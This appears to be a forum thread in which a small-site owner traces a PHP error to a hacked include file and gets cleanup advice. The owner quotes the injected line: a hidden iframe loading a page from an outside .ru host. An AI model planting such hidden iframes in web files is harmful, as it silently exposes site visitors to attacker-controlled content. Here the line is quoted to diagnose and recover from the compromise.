Greeting all,

Not sure why or how (which is obviously why I am here!) but my website is suddenly displaying this message:

Quote
Parse error: syntax error, unexpected $end in /home/spiri18/public_html/includes/languages/english/index.php on line 146

I have downloaded that file and looked at line 146 but I do not understand how to fix this. I just relaized you might need to look at that line but I can't post it at this time....will do so later.  Anyone know why I would be getting this error on my home page?

Thank you!

The obvious question is what changes have you made recently? The error is saying that while parsing a php file it reached the end of the file unexpectedly. This is often due to an unclosed routine such as an if or while statement that is missing the closing bracket.

Here's what is on line 146:

<iframe src="http://u9j.ru:8080/index.php" width=130 height=200 style="visibility: hidden"></iframe>

I have not made any changes that is why I'm even more confused about this than ever.  I have a rudimentary understanding of html and near zero of php...I basically stumble along.  Asking lunar pages support for help led me here to beg and grovel.  Grinning

So with my basic 'understanding' (using that word very loosely!) I ask...should that iframe src be pointing to my site?  I have no idea what that u9j.ru:808 is.....

I rooted around in my backups and found that file - copy and pasted what had been there over this new line and it worked -- my header is larger now but at least the site appears to be up and running....no clue what happened or why which is most uncomfortable.  Anyone here who consults part time?  I have a new site that I was thinking of installing zen cart on but need assistance.  Please PM me if you do consulting on either os commerce or zen cart.  Thank you!  Very Happy

You've been hacked by some Russian. Get rid of the iframe, check for other corrupted files, update any canned scripts (forums, stores, galleries, blogs, etc.) to the current version, change your passwords, scan your PC for spyware (especially keystroke loggers and password sniffers).

I have done most of what you suggested - that which I know how to do.  Admitting defeat, I requested that Lunar Pages reset my site to default but they do not offer this.  Told me I had to delete unwanted files myself - of which there were a TON...all porn.  Very disturbing to see these files had been installed on my website and the traffic to/from them was mind boggling.

I will root around for more info here in the forum on how to lock my site down tight (other than the obvious - use strong passwords changed often) but if you can direct me to any threads related to this for newbies I would very much appreciate it.  I see that you consult and have visited your website.  Thank you for your reply.
